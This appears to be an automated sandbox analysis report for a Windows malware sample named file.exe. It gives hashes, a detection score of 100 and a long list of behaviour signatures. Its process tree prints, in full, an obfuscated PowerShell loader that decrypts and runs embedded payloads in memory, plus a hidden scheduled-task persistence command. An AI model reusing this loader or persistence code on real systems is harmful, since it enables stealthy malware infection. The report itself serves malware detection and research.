Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
| Sample name: | file.exe |
| Analysis ID: | 1493241 |
| MD5: | bd315453d1c70b1683863d8709e7a3b8 |
| SHA1: | 2c0db6606b7321a55b04645c79642fa35426743e |
| SHA256: | 496b503ab6692efcb2967335b324ed00169e9ed6766529d730ef58e7927e8ffa |
| Tags: | exe |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Loading BitLocker PowerShell Module
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
file.exe (PID: 7452 cmdline: "C:\Users\ user\Deskt op\file.ex e" MD5: BD315453D1C70B1683863D8709E7A3B8) 
cmd.exe (PID: 7468 cmdline: cmd /c "Op era_Update .bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7524 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho functio n decrypt_ function($ param_var) { $aes_var =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $ae s_var.Mode =[System.S ecurity.Cr yptography .CipherMod e]::CBC; $ aes_var.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $ae s_var.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('9E HtJ11By61k S8vpIjv1e6 +WeJMREtPF NuaC1PKqnx U='); $aes _var.IV=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('ddps lYZ3AovF8/ F/PVkcRw== '); $decry ptor_var=$ aes_var.Cr eateDecryp tor(); $re turn_var=$ decryptor_ var.Transf ormFinalBl ock($param _var, 0, $ param_var. Length); $ decryptor_ var.Dispos e(); $aes_ var.Dispos e(); $retu rn_var;}fu nction dec ompress_fu nction($pa ram_var){ $nMJpl=New -Object Sy stem.IO.Me moryStream (,$param_v ar); $pYOJ O=New-Obje ct System. IO.MemoryS tream; $PZ yWJ=New-Ob ject Syste m.IO.Compr ession.GZi pStream($n MJpl, [IO. Compressio n.Compress ionMode]:: Decompress ); $PZyWJ. CopyTo($pY OJO); $PZy WJ.Dispose (); $nMJpl .Dispose() ; $pYOJO.D ispose(); $pYOJO.ToA rray();}fu nction exe cute_funct ion($param _var,$para m2_var){ $ ybABJ=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $param_var ); $XmKpu= $ybABJ.Ent ryPoint; $ XmKpu.Invo ke($null, $param2_va r);}$NtXQf = 'C:\Use rs\user\Ap pData\Loca l\Temp\IXP 000.TMP\Op era_Update .bat';$hos t.UI.RawUI .WindowTit le = $NtXQ f;$xcJVx=[ System.IO. File]::('t xeTllAdaeR '[-1..-11] -join '') ($NtXQf).S plit([Envi ronment]:: NewLine);f oreach ($J txvS in $x cJVx) { if ($JtxvS.S tartsWith( 'GIzCsOPRF tcNTtsmEyZ B')) { $Tj CqT=$JtxvS .Substring (20); brea k; }}$payl oads_var=[ string[]]$ TjCqT.Spli t('\');$pa yload1_var =decompres s_function (decrypt_ function ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $payloads_ var[0].Rep lace('#', '/').Repla ce('@', 'A '))));$pay load2_var= decompress _function (decrypt_f unction ([ Convert]:: ('gnirtS46 esaBmorF'[ -1..-16] - join '')($ payloads_v ar[1].Repl ace('#', ' /').Replac e('@', 'A' ))));execu te_functio n $payload 1_var $nul l;execute_ function $ payload2_v ar (,[stri ng[]] ('') ); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
powershell.exe (PID: 7532 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7692 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Register-S cheduledTa sk -TaskNa me 'Window s_Log_414_ str' -Trig ger (New-S cheduledTa skTrigger -AtLogon) -Action (N ew-Schedul edTaskActi on -Execut e 'C:\User s\user\App Data\Roami ng\Windows _Log_414.v bs') -Sett ings (New- ScheduledT askSetting sSet -Allo wStartIfOn Batteries -Hidden -E xecutionTi meLimit 0) -RunLevel Highest - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 7932 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Windo ws_Log_414 .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7984 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Windows _Log_414.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8036 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho functio n decrypt_ function($ param_var) { $aes_var =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $ae s_var.Mode =[System.S ecurity.Cr yptography .CipherMod e]::CBC; $ aes_var.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $ae s_var.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('9E HtJ11By61k S8vpIjv1e6 +WeJMREtPF NuaC1PKqnx U='); $aes _var.IV=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('ddps lYZ3AovF8/ F/PVkcRw== '); $decry ptor_var=$ aes_var.Cr eateDecryp tor(); $re turn_var=$ decryptor_ var.Transf ormFinalBl ock($param _var, 0, $ param_var. Length); $ decryptor_ var.Dispos e(); $aes_ var.Dispos e(); $retu rn_var;}fu nction dec ompress_fu nction($pa ram_var){ $nMJpl=New -Object Sy stem.IO.Me moryStream (,$param_v ar); $pYOJ O=New-Obje ct System. IO.MemoryS tream; $PZ yWJ=New-Ob ject Syste m.IO.Compr ession.GZi pStream($n MJpl, [IO. Compressio n.Compress ionMode]:: Decompress ); $PZyWJ. CopyTo($pY OJO); $PZy WJ.Dispose (); $nMJpl .Dispose() ; $pYOJO.D ispose(); $pYOJO.ToA rray();}fu nction exe cute_funct ion($param _var,$para m2_var){ $ ybABJ=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $param_var ); $XmKpu= $ybABJ.Ent ryPoint; $ XmKpu.Invo ke($null, $param2_va r);}$NtXQf = 'C:\Use rs\user\Ap pData\Roam ing\Window s_Log_414. bat';$host .UI.RawUI. WindowTitl e = $NtXQf ;$xcJVx=[S ystem.IO.F ile]::('tx eTllAdaeR' [-1..-11] -join '')( $NtXQf).Sp lit([Envir onment]::N ewLine);fo reach ($Jt xvS in $xc JVx) { if ($JtxvS.St artsWith(' GIzCsOPRFt cNTtsmEyZB ')) { $TjC qT=$JtxvS. Substring( 20); break ; }}$paylo ads_var=[s tring[]]$T jCqT.Split ('\');$pay load1_var= decompress _function (decrypt_f unction ([ Convert]:: ('gnirtS46 esaBmorF'[ -1..-16] - join '')($ payloads_v ar[0].Repl ace('#', ' /').Replac e('@', 'A' ))));$payl oad2_var=d ecompress_ function ( decrypt_fu nction ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($p ayloads_va r[1].Repla ce('#', '/ ').Replace ('@', 'A') )));execut e_function $payload1 _var $null ;execute_f unction $p ayload2_va r (,[strin g[]] ('')) ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 8044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 7852 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\App Data\Roami ng\Windows _Log_414.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
rundll32.exe (PID: 8144 cmdline: "C:\Window s\system32 \rundll32. exe" C:\Wi ndows\syst em32\advpa ck.dll,Del NodeRunDLL 32 "C:\Use rs\user\Ap pData\Loca l\Temp\IXP 000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: | ||
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Subhash Popuri (@pbssubhash): | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Hieu Tran: | ||